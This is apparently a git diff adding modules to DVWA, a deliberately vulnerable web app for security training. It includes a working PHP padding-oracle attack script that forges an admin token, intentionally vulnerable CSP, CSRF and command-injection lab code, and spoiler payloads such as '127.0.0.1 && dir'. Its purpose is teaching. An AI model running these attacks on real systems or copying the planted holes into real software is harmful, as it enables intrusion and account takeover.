+ curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode ($data));
+
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($ch, CURLOPT_HEADER, true);
+
+ $response = curl_exec($ch);
+
+ $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
+ $header = substr($response, 0, $header_size);
+ $body = substr($response, $header_size);
+
+ // May return false or something that evaluates to false
+ // so can't do strict type check
+ if ($response == false) {
+ print "Could not access remote server, is the URL correct?
+${url}
+";
+ exit;
+ }
+ if (strpos ($header, "200 OK") === false) {
+ print "Check token script not found, have you got the right URL?
+${url}
+";
+ exit;
+ }
+
+ curl_close($ch);
+ }
+
+ return json_decode ($body, true);
+}
+
+function do_attack ($iv_string_b64, $token, $url) {
+ $iv_string = base64_decode ($iv_string_b64);
+ $temp_init_iv = unpack('C*', $iv_string);
+
+ # The unpack creates an array starting a 1, the
+ # rest of this code assumes an array starting at 0
+ # so calling array_values changes the array 0 based
+
+ $init_iv = array_values ($temp_init_iv);
+
+ print "Trying to decrypt\n";
+ print "\n";
+
+ $iv = zero_array(16);
+ $zeroing = zero_array(16);
+
+
+ for ($padding = 1; $padding <= 16; $padding++) {
+ $offset = 16 - $padding;
+ print ("Looking at offset $offset for padding $padding\n");
+ for ($i = 0; $i <= 0xff; $i++) {
+ $iv[$offset] = $i;
+ for ($k = $offset + 1; $k < 16; $k++) {
+ $iv[$k] = $zeroing[$k] ^ $padding;
+ }
+ try {
+ $obj = make_call ($token, $iv, $url);
+
+ # 526 is decryption failed
+ if ($obj['status'] != 526) {
+ print "Got hit for: " . $i . "\n";
+
+ # Only get here if the decrypt works correctly
+
+ /*
+
+ Check for edge case on offset 15 (right most byte).
+ The decrypted data could look like this:
+
+ 0x44 ... 0x02 0x02
+ ^^^^ Real last byte of value 2 byte padding
+
+ In this situation, if we happen to land on a value
+ that sets the last byte to 0x02 then that will
+ look like valid padding as it will make the data end
+ in 0x02 0x02 as it already does:
+
+ 0x44 ... 0x02 0x02
+ ^^^^ Fluke, we want 0x01 for 1 byte padding
+
+ This is what we want:
+
+ 0x44 ... 0x02 0x01
+ ^^^^ Valid 1 byte padding
+
+ To do this, change the IV value for offset 14 which will
+ change the second to last byte and make the call again.
+ If we were in the edge case we would now have:
+
+ 0x44 ... 0xf3 0x02
+ ^^^^ No longer valid padding
+
+ This is no longer valid padding so it will fail and we can
+ continue looking till we find the value that gives us
+ valid 1 byte padding.
+
+ */
+
+ // Used by the edge case check
+
+ $ignore = false;
+ if ($offset == 15) {
+ print "Got a valid decrypt for offset 15, checking edge case\n";
+ $temp_iv = $iv;
+ $temp_iv[14] = 0xff;
+ $temp_d_obj = make_call ($token, $temp_iv, $url);
+ if ($temp_d_obj['status'] != 526) {
+ print "Not edge case, can continue\n";
+ } else {
+ print "Edge case, do not continue\n";
+ $ignore = true;
+ }
+ }
+
+ if (!$ignore) {
+ print "There was a match\n";
+ $zeroing[$offset] = $i ^ $padding;
+ # print "IV: " . byte_array_to_string ($iv) . "\n";
+ # print "Zero: " . byte_array_to_string ($zeroing) . "\n";
+ break;
+ }
+ }
+ } catch(Exception $exp) {
+ # print "Fail\n";
+ # var_dump ($e);
+ }
+ }
+ }
+
+ print "\n";
+ print "Finished looping\n";
+ print "\n";
+
+ print "Derived IV is: " . byte_array_to_string ($iv) . "\n";
+
+ # If you want to check this, it should be all 16 to show it is all padding
+ # $x = xor_byte_array ($iv, $zeroing);
+ # print "Derived IV XOR and zeroing string: " . byte_array_to_string ($x) . "\n";
+
+ print "Real IV is: " . byte_array_to_string ($init_iv) . "\n";
+ print "Zeroing array is: " . byte_array_to_string ($zeroing) . "\n";
+ print "\n";
+
+ $x = xor_byte_array ($init_iv, $zeroing);
+ print "Decrypted string with padding: " . byte_array_to_string ($x) . "\n";
+ $number_of_padding_bytes = $x[15];
+ $without_padding = array_slice ($x, 0, 16 - $number_of_padding_bytes);
+ print "Decrypted string without padding: " . byte_array_to_string ($without_padding) . "\n";
+
+ $str = '';
+ for ($i = 0; $i < count ($without_padding); $i++) {
+ $c = $without_padding[$i];
+ if ($c > 0x19 && $c < 0x7f) {
+ $str .= chr($c);
+ } else {
+ $str .= "0x" . sprintf ("%02x", $c) . " ";
+ }
+ }
+
+ print "Decrypted string as text: " . $str . "\n";
+
+ /*
+ Trying to modify decrypted data by playing with the zeroing array.
+ */
+
+ print "\n";
+ print "Trying to modify string\n";
+ print "\n";
+
+ $new_clear = "userid:1";
+ print "New clear text: " . $new_clear . "\n";
+
+ for ($i = 0; $i < strlen($new_clear); $i++) {
+ $zeroing[$i] = $zeroing[$i] ^ ord($new_clear[$i]);
+ }
+ $padding = 16 - strlen($new_clear);
+ $offset = 16 - $padding;
+ for ($i = $offset; $i < 16; $i++) {
+ $zeroing[$i] = $zeroing[$i] ^ $padding;
+ }
+
+ print "New IV is: " . byte_array_to_string ($zeroing) . "\n";
+ print "\n";
+
+ print "Sending new data to server...\n";
+ print "\n";
+
+ try {
+ $ret_obj = make_call ($token, $zeroing, $url);
+
+ print "Response from server:\n";
+ var_dump ($ret_obj);
+
+ if ($ret_obj['status'] == 200 && $ret_obj['level'] == "admin") {
+ print "\n";
+ print "Hack success!\n\n";
+ print "The new token is:\n";
+
+ # This maps the IV byte array down to a string
+ $iv_string = implode(array_map("chr", $zeroing));
+
+ # Now base64 encode it so it is safe to send
+ $iv_string_b64 = base64_encode ($iv_string);
+
+ $new_token = array (
+ "token" => $token,
+ "iv" => $iv_string_b64
+ );
+ print json_encode ($new_token);
+ print "\n\n";
+ } else {
+ print "Hack failed\n";
+ }
+ } catch (Exception $exp) {
+ print "Hack failed, system could not decrypt message\n";
+ var_dump ($exp);
+ }
+}
+
+$shortopts = "";
+$shortopts .= "h"; // Help
+
+$longopts = array(
+"url:", // Required value
+"iv:", // Required value
+"token:", // Required value
+"local", // No value
+"help", // No value
+);
+$options = getopt($shortopts, $longopts);
+
+if (array_key_exists ("h", $options) || array_key_exists ("help", $options)) {
+ print "This script can either test against a local decryptor or a remote.\n
+To test locally, pass --local, otherwise pass the IV, token and URL for the remote system.
+
+--local - Test locally
+--iv - IV from remote system
+--token - Token from remote system
+--url - URL for the check function
+-h, --help - help
+
+";
+ exit;
+} elseif (array_key_exists ("l", $options) || array_key_exists ("local", $options)) {
+ print "Creating the token locally\n\n";
+
+ $token_data = json_decode (create_token(true), true);
+
+ $token = $token_data['token'];
+ $iv = $token_data['iv'];
+ $url = null;
+} elseif (array_key_exists ("iv", $options) &&
+ array_key_exists ("token", $options) &&
+ array_key_exists ("url", $options)) {
+ print "Attacking remote server using parameters provided\n\n";
+
+ $token = $options['token'];
+ $iv = $options['iv'];
+ $url = $options['url'];
+} else {
+ print "Either specify --local or provide the IV, token and URL\n\n";
+ exit;
+}
+
+do_attack ($iv, $token, $url);
diff --git a/DVWA/vulnerabilities/cryptography/source/token_library_high.php b/DVWA/vulnerabilities/cryptography/source/token_library_high.php
new file mode 100644
index 00000000..29c93559
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/source/token_library_high.php
@@ -0,0 +1,132 @@
+ base64_encode ($e),
+ "iv" => base64_encode (IV)
+ );
+ return json_encode($data);
+}
+
+function check_token ($data) {
+ $users = array ();
+ $users[1] = array ("name" => "Geoffery", "level" => "admin");
+ $users[2] = array ("name" => "Bungle", "level" => "user");
+ $users[3] = array ("name" => "Zippy", "level" => "user");
+ $users[4] = array ("name" => "George", "level" => "user");
+
+ $data_array = false;
+ try {
+ $data_array = json_decode ($data, true);
+ } catch (TypeError $exp) {
+ $ret = array (
+ "status" => 521,
+ "message" => "Data not in JSON format",
+ "extra" => $exp->getMessage()
+ );
+ }
+
+ if (is_null ($data_array)) {
+ $ret = array (
+ "status" => 522,
+ "message" => "Data in wrong format"
+ );
+ } else {
+ if (!array_key_exists ("token", $data_array)) {
+ $ret = array (
+ "status" => 523,
+ "message" => "Missing token"
+ );
+ return json_encode ($ret);
+ }
+ if (!array_key_exists ("iv", $data_array)) {
+ $ret = array (
+ "status" => 524,
+ "message" => "Missing IV"
+ );
+ return json_encode ($ret);
+ }
+
+ $ciphertext = base64_decode ($data_array['token']);
+ $iv = base64_decode ($data_array['iv']);
+
+ # Asssume failure
+ $ret = array (
+ "status" => 500,
+ "message" => "Unknown error"
+ );
+ try {
+ $d = decrypt ($ciphertext, $iv);
+ if (preg_match ("/^userid:(\d+)$/", $d, $matches)) {
+ $id = $matches[1];
+ if (array_key_exists ($id, $users)) {
+ $user = $users[$id];
+ $ret = array (
+ "status" => 200,
+ "user" => $user["name"],
+ "level" => $user['level']
+ );
+ } else {
+ $ret = array (
+ "status" => 525,
+ "message" => "User not found"
+ );
+ }
+ } else {
+ $ret = array (
+ "status" => 527,
+ "message" => "No user specified"
+ );
+ }
+ } catch (Exception $exp) {
+ $ret = array (
+ "status" => 526,
+ "message" => "Unable to decrypt token",
+ "extra" => $exp->getMessage()
+ );
+ }
+ }
+ return json_encode ($ret);
+}
diff --git a/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php b/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php
new file mode 100644
index 00000000..4f31a6a0
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php
@@ -0,0 +1,130 @@
+ base64_encode ($e),
+ "iv" => base64_encode ($iv),
+ );
+ return json_encode($data);
+}
+
+function check_token ($data) {
+ $users = array ();
+ $users[1] = array ("name" => "Geoffery", "level" => "admin");
+ $users[2] = array ("name" => "Bungle", "level" => "user");
+ $users[3] = array ("name" => "Zippy", "level" => "user");
+ $users[4] = array ("name" => "George", "level" => "user");
+
+ $data_array = false;
+ try {
+ $data_array = json_decode ($data, true);
+ } catch (TypeError $exp) {
+ $ret = array (
+ "status" => 521,
+ "message" => "Data not in JSON format",
+ "extra" => $exp->getMessage()
+ );
+ }
+
+ if (is_null ($data_array)) {
+ $ret = array (
+ "status" => 522,
+ "message" => "Data in wrong format"
+ );
+ } else {
+ if (!array_key_exists ("token", $data_array)) {
+ $ret = array (
+ "status" => 523,
+ "message" => "Missing token"
+ );
+ return json_encode ($ret);
+ }
+ if (!array_key_exists ("iv", $data_array)) {
+ $ret = array (
+ "status" => 524,
+ "message" => "Missing IV"
+ );
+ return json_encode ($ret);
+ }
+
+ $ciphertext = base64_decode ($data_array['token']);
+ $iv = base64_decode ($data_array['iv']);
+
+ # Asssume failure
+ $ret = array (
+ "status" => 500,
+ "message" => "Unknown error"
+ );
+ try {
+ $d = decrypt ($ciphertext, $iv);
+ if (preg_match ("/^userid:(\d+)$/", $d, $matches)) {
+ $id = $matches[1];
+ if (array_key_exists ($id, $users)) {
+ $user = $users[$id];
+ $ret = array (
+ "status" => 200,
+ "user" => $user["name"],
+ "level" => $user['level']
+ );
+ } else {
+ $ret = array (
+ "status" => 525,
+ "message" => "User not found"
+ );
+ }
+ } else {
+ $ret = array (
+ "status" => 527,
+ "message" => "No user specified"
+ );
+ }
+ } catch (Exception $exp) {
+ $ret = array (
+ "status" => 526,
+ "message" => "Unable to decrypt token",
+ "extra" => $exp->getMessage()
+ );
+ }
+ }
+ return json_encode ($ret);
+}
diff --git a/DVWA/vulnerabilities/cryptography/source/xor_theory.php b/DVWA/vulnerabilities/cryptography/source/xor_theory.php
new file mode 100644
index 00000000..ad04c2ad
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/source/xor_theory.php
@@ -0,0 +1,36 @@
+'; // For debugging
+ }
+ }
+ return $outText;
+}
+
+$clear = "hello world, what a great day";
+$key = "wachtwoord";
+
+print "Clear text\n" . $clear . "\n";
+print "\n";
+
+$encoded = (xor_this($clear, $key));
+$b64_encoded = base64_encode ($encoded);
+print "Encoded text\n";
+var_dump ($b64_encoded);
+print "\n";
+
+$b64_decoded = base64_decode ($b64_encoded);
+$decoded = xor_this($b64_decoded, $key);
+print "Decoded text\n";
+var_dump ($decoded);
+print "\n";
+
+?>
diff --git a/DVWA/vulnerabilities/csp/help/help.php b/DVWA/vulnerabilities/csp/help/help.php
new file mode 100644
index 00000000..b6342196
--- /dev/null
+++ b/DVWA/vulnerabilities/csp/help/help.php
@@ -0,0 +1,58 @@
+
+
+ +
diff --git a/DVWA/vulnerabilities/csp/index.php b/DVWA/vulnerabilities/csp/index.php
new file mode 100644
index 00000000..bd99db15
--- /dev/null
+++ b/DVWA/vulnerabilities/csp/index.php
@@ -0,0 +1,57 @@
+
+ Help - Content Security Policy (CSP) Bypass
+ +
+
+
+
+
+
+
+ About+Content Security Policy (CSP) is used to define where scripts and other resources can be loaded or executed from. This module will walk you through ways to bypass the policy based on common mistakes made by developers. +None of the vulnerabilities are actual vulnerabilities in CSP, they are vulnerabilities in the way it has been implemented. + ++ + Objective+Bypass Content Security Policy (CSP) and execute JavaScript in the page. + ++ + Low Level+Examine the policy to find all the sources that can be used to host external script files. +This exercise was originally written to work with Pastebin, then updated for Hastebin, then Toptal, but all these stopped working as they set various headers that prevent the browser executing the JavaScript once it has downloaded it. To get around this, there are a selection of links included in the exercise, some will work, some will not, try to work out why. + Spoiler:
+alert.js - Will work, this is a normal JavaScript file served with the correct headers.
+alert.txt - This will not work as it has the wrong content type set by the web server due to its file extension.
+cookie.js - This will work and will show your cookies
+forced_download.js - As the name says, the server sets the "Content-Disposition: attachment" header for this to force the browser to download it rather than execute it.
+wrong_content_type.js - This will not work as the web server ignores the file extension and forces the content type to get set as "plain/text" which prevents the browser executing it.
+
+ + + Medium Level+The CSP policy tries to use a nonce to prevent inline scripts from being added by attackers. +Spoiler: Examine the nonce and see how it varies (or doesn't).
+
+ + + High Level+The page makes a JSONP call to source/jsonp.php passing the name of the function to callback to, you need to modify the jsonp.php script to change the callback function. +Spoiler: The JavaScript on the page will execute whatever is returned by the page, changing this to your own code will execute that instead
+
+ + + Impossible Level++ This level is an update of the high level where the JSONP call has its callback function hardcoded and the CSP policy is locked down to only allow external scripts. + + |
+
+ +
Reference:
+Reference:
+Reference:
+Vulnerability: Content Security Policy (CSP) Bypass
+ +
+EOF;
+
+require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/csp/source/{$vulnerabilityFile}";
+
+$page[ 'body' ] .= <<
+EOF;
+
+$page[ 'body' ] .= "
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/csp/source/high.js b/DVWA/vulnerabilities/csp/source/high.js
new file mode 100644
index 00000000..a4b10cfd
--- /dev/null
+++ b/DVWA/vulnerabilities/csp/source/high.js
@@ -0,0 +1,19 @@
+function clickButton() {
+ var s = document.createElement("script");
+ s.src = "source/jsonp.php?callback=solveSum";
+ document.body.appendChild(s);
+}
+
+function solveSum(obj) {
+ if ("answer" in obj) {
+ document.getElementById("answer").innerHTML = obj['answer'];
+ }
+}
+
+var solve_button = document.getElementById ("solve");
+
+if (solve_button) {
+ solve_button.addEventListener("click", function() {
+ clickButton();
+ });
+}
diff --git a/DVWA/vulnerabilities/csp/source/high.php b/DVWA/vulnerabilities/csp/source/high.php
new file mode 100644
index 00000000..18e1bf0f
--- /dev/null
+++ b/DVWA/vulnerabilities/csp/source/high.php
@@ -0,0 +1,22 @@
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://content-security-policy.com/', "Content Security Policy Reference" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP', "Mozilla Developer Network - CSP: script-src") . " +
- " . dvwaExternalLinkUrlGet( 'https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/', "Mozilla Security Blog - CSP for the web we have" ) . " +
Module developed by Digininja.
+The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.
+1+2+3+4+5=
+ + + + +'; + diff --git a/DVWA/vulnerabilities/csp/source/impossible.js b/DVWA/vulnerabilities/csp/source/impossible.js new file mode 100644 index 00000000..11b56aa5 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/impossible.js @@ -0,0 +1,19 @@ +function clickButton() { + var s = document.createElement("script"); + s.src = "source/jsonp_impossible.php"; + document.body.appendChild(s); +} + +function solveSum(obj) { + if ("answer" in obj) { + document.getElementById("answer").innerHTML = obj['answer']; + } +} + +var solve_button = document.getElementById ("solve"); + +if (solve_button) { + solve_button.addEventListener("click", function() { + clickButton(); + }); +} diff --git a/DVWA/vulnerabilities/csp/source/impossible.php b/DVWA/vulnerabilities/csp/source/impossible.php new file mode 100644 index 00000000..320fd2f1 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/impossible.php @@ -0,0 +1,23 @@ + + +Unlike the high level, this does a JSONP call but does not use a callback, instead it hardcodes the function to call.
The CSP settings only allow external JavaScript on the local server and no inline code.
+1+2+3+4+5=
+ + + + +'; + diff --git a/DVWA/vulnerabilities/csp/source/jsonp.php b/DVWA/vulnerabilities/csp/source/jsonp.php new file mode 100644 index 00000000..fcfc5352 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/jsonp.php @@ -0,0 +1,13 @@ + "15"); + +echo $callback . "(".json_encode($outp).")"; +?> diff --git a/DVWA/vulnerabilities/csp/source/jsonp_impossible.php b/DVWA/vulnerabilities/csp/source/jsonp_impossible.php new file mode 100644 index 00000000..090a38b8 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/jsonp_impossible.php @@ -0,0 +1,7 @@ + "15"); + +echo "solveSum (".json_encode($outp).")"; +?> diff --git a/DVWA/vulnerabilities/csp/source/low.php b/DVWA/vulnerabilities/csp/source/low.php new file mode 100644 index 00000000..73fbc047 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/low.php @@ -0,0 +1,37 @@ + + +"; +} +$page[ 'body' ] .= ' + ++ As Pastebin and Hastebin have stopped working, here are some scripts that may, or may not help. +
+-
+
- https://digi.ninja/dvwa/alert.js +
- https://digi.ninja/dvwa/alert.txt +
- https://digi.ninja/dvwa/cookie.js +
- https://digi.ninja/dvwa/forced_download.js +
- https://digi.ninja/dvwa/wrong_content_type.js +
+ Pretend these are on a server like Pastebin and try to work out why some work and some do not work. Check the help for an explanation if you get stuck. +
+'; diff --git a/DVWA/vulnerabilities/csp/source/medium.php b/DVWA/vulnerabilities/csp/source/medium.php new file mode 100644 index 00000000..0fd03209 --- /dev/null +++ b/DVWA/vulnerabilities/csp/source/medium.php @@ -0,0 +1,25 @@ +alert(1) + +?> + +Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.
+ + + +'; diff --git a/DVWA/vulnerabilities/csrf/help/help.php b/DVWA/vulnerabilities/csrf/help/help.php new file mode 100644 index 00000000..1c3d8b70 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/help/help.php @@ -0,0 +1,71 @@ +
+
+ +
diff --git a/DVWA/vulnerabilities/csrf/index.php b/DVWA/vulnerabilities/csrf/index.php
new file mode 100644
index 00000000..cef64c3d
--- /dev/null
+++ b/DVWA/vulnerabilities/csrf/index.php
@@ -0,0 +1,96 @@
+Test CredentialsHelp - Cross Site Request Forgery (CSRF)
+ +
+
+
+
+
+
+
+ About+CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. + With a little help of social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of + the attacker's choosing. + +A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is + the administrator account, this can compromise the entire web application. + +This attack may also be called "XSRF", similar to "Cross Site scripting (XSS)", and they are often used together. + ++ + Objective+Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack. + ++ + Low Level+There are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password). + Then with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action. +Spoiler: ?password_new=password&password_conf=password&Change=Change.
+
+ + + Medium Level+For the medium level challenge, there is a check to see where the last requested page came from. The developer believes if it matches the current domain, + it must of come from the web application so it can be trusted. +It may be required to link in multiple vulnerabilities to exploit this vector, such as reflective XSS. + ++ + High Level+In the high level, the developer has added an "anti Cross-Site Request Forgery (CSRF) token". In order by bypass this protection method, another vulnerability will be required. +Spoiler: e.g. Javascript is a executed on the client side, in the browser.
+
+ Bonus Challenge+At this level, the site will also accept a change password request as a JSON object in the following format: +When done this way, the CSRF token must be passed as a header named Here is a sample request: ++ + Impossible Level+At this level, the site requires the user to give their current password as well as the new password. As the attacker does not know this, the site is protected against CSRF style attacks. + |
+
+ +
Reference:
++ +"; + +$page[ 'body' ] .= " +
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/csrf/source/high.php b/DVWA/vulnerabilities/csrf/source/high.php
new file mode 100644
index 00000000..a0c79138
--- /dev/null
+++ b/DVWA/vulnerabilities/csrf/source/high.php
@@ -0,0 +1,69 @@
+$return_message));
+ exit;
+ } else {
+ $html .= "Vulnerability: Cross Site Request Forgery (CSRF)
+ +
+
+
+ + {$html} +
+ Change your admin password:
++
+ ".$testCredentials ."
+
+ + {$html} +
Note: Browsers are starting to default to setting the SameSite cookie flag to Lax, and in doing so are killing off some types of CSRF attacks. When they have completed their mission, this lab will not work as originally expected.
+Announcements:
+ +As an alternative to the normal attack of hosting the malicious URLs or code on a separate host, you could try using other vulnerabilities in this app to store them, the Stored XSS lab would be a good place to start.
+ +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/csrf' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/csrf-faq.html' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_request_forgery ' ) . " +
" . $return_message . ""; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/csrf/source/impossible.php b/DVWA/vulnerabilities/csrf/source/impossible.php new file mode 100644 index 00000000..7baad861 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/impossible.php @@ -0,0 +1,50 @@ +prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $current_user = dvwaCurrentUser(); + $data->bindParam( ':user', $current_user, PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new passwords match and does the current password match the user? + if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { + // It does! + $pass_new = stripslashes( $pass_new ); + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database with new password + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $current_user = dvwaCurrentUser(); + $data->bindParam( ':user', $current_user, PDO::PARAM_STR ); + $data->execute(); + + // Feedback for the user + $html .= "
Password Changed."; + } + else { + // Issue with passwords matching + $html .= "
Passwords did not match or current password incorrect."; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/csrf/source/low.php b/DVWA/vulnerabilities/csrf/source/low.php new file mode 100644 index 00000000..2f41a4e1 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/low.php @@ -0,0 +1,30 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the user + $html .= "
Password Changed."; + } + else { + // Issue with passwords matching + $html .= "
Passwords did not match."; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/csrf/source/medium.php b/DVWA/vulnerabilities/csrf/source/medium.php new file mode 100644 index 00000000..65089d4a --- /dev/null +++ b/DVWA/vulnerabilities/csrf/source/medium.php @@ -0,0 +1,37 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the user + $html .= "
Password Changed."; + } + else { + // Issue with passwords matching + $html .= "
Passwords did not match."; + } + } + else { + // Didn't come from a trusted source + $html .= "
That request didn't look correct."; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/csrf/test_credentials.php b/DVWA/vulnerabilities/csrf/test_credentials.php new file mode 100644 index 00000000..e7274a79 --- /dev/null +++ b/DVWA/vulnerabilities/csrf/test_credentials.php @@ -0,0 +1,54 @@ +'. mysqli_connect_error() . '.
Try installing again.' ); + if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful... + $login_state = "
Valid password for '{$user}'
"; + }else{ + // Login failed + $login_state = "Wrong password for '{$user}'
"; + } + +} +$messagesHtml = messagesPopAllToHtml(); +$page = dvwaPageNewGrab(); + +$page[ 'title' ] .= "Test Credentials"; +$page[ 'body' ] .= " +
+
\n";
+
+dvwaSourceHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/exec/help/help.php b/DVWA/vulnerabilities/exec/help/help.php
new file mode 100644
index 00000000..d28c7ef0
--- /dev/null
+++ b/DVWA/vulnerabilities/exec/help/help.php
@@ -0,0 +1,62 @@
+Test Credentials
+Vulnerabilities/CSRF
+
+
+ {$messagesHtml}
+
+
+
+ +
diff --git a/DVWA/vulnerabilities/exec/index.php b/DVWA/vulnerabilities/exec/index.php
new file mode 100644
index 00000000..6a0de9ed
--- /dev/null
+++ b/DVWA/vulnerabilities/exec/index.php
@@ -0,0 +1,67 @@
+
+ Help - Command Injection
+ +
+
+
+
+
+
+
+ About+The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. + In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it + as any authorized system user. However, commands are executed with the same privileges and environment as the web service has. + +Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker + (forms, cookies, HTTP headers etc.). + +The syntax and commands may differ between the Operating Systems (OS), such as Linux and Windows, depending on their desired actions. + +This attack may also be called "Remote Command Execution (RCE)". + ++ + Objective+Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE. + ++ + Low Level+This allows for direct input into one of many PHP functions that will execute commands on the OS. It is possible to escape out of the designed command and + executed unintentional actions. +This can be done by adding on to the request, "once the command has executed successfully, run this command". + Spoiler: To add a command "&&". Example: 127.0.0.1 && dir.+ + + + Medium Level+The developer has read up on some of the issues with command injection, and placed in various pattern patching to filter the input. However, this isn't enough. +Various other system syntaxes can be used to break out of the desired command. +Spoiler: e.g. background the ping command.
+
+ + + High Level+In the high level, the developer goes back to the drawing board and puts in even more pattern to match. But even this isn't enough. +The developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake. +Spoiler:
+ removes all leading & trailing spaces, right?.
+
+ + + Impossible Level+In the impossible level, the challenge has been re-written, only to allow a very stricted input. If this doesn't match and doesn't produce a certain result, + it will not be allowed to execute. Rather than "black listing" filtering (allowing any input and removing unwanted), this uses "white listing" (only allow certain values). + |
+
+ +
Reference:
+Vulnerability: Command Injection
+ +
+
+
+ Ping a device
+ + + {$html} +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution' ) . " +
- " . dvwaExternalLinkUrlGet( 'http://www.ss64.com/bash/' ) . " +
- " . dvwaExternalLinkUrlGet( 'http://www.ss64.com/nt/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Command_Injection' ) . " +
{$cmd}";
+}
+
+?>
diff --git a/DVWA/vulnerabilities/exec/source/impossible.php b/DVWA/vulnerabilities/exec/source/impossible.php
new file mode 100644
index 00000000..aa495516
--- /dev/null
+++ b/DVWA/vulnerabilities/exec/source/impossible.php
@@ -0,0 +1,41 @@
+{$cmd}";
+ }
+ else {
+ // Ops. Let the user name theres a mistake
+ $html .= 'ERROR: You have entered an invalid IP.'; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/exec/source/low.php b/DVWA/vulnerabilities/exec/source/low.php new file mode 100644 index 00000000..e4a7f596 --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/low.php @@ -0,0 +1,21 @@ +{$cmd}"; +} + +?> diff --git a/DVWA/vulnerabilities/exec/source/medium.php b/DVWA/vulnerabilities/exec/source/medium.php new file mode 100644 index 00000000..c7c1564b --- /dev/null +++ b/DVWA/vulnerabilities/exec/source/medium.php @@ -0,0 +1,30 @@ + '', + ';' => '', + ); + + // Remove any of the characters in the array (blacklist). + $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); + + // Determine OS and execute the ping command. + if( stristr( php_uname( 's' ), 'Windows NT' ) ) { + // Windows + $cmd = shell_exec( 'ping ' . $target ); + } + else { + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); + } + + // Feedback for the end user + $html .= "
{$cmd}";
+}
+
+?>
diff --git a/DVWA/vulnerabilities/fi/file1.php b/DVWA/vulnerabilities/fi/file1.php
new file mode 100644
index 00000000..04606976
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/file1.php
@@ -0,0 +1,22 @@
+
+ Vulnerability: File Inclusion
+
+
+ Hello " . dvwaCurrentUser() . "
+ Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
+ [back] +
+
+ File 1
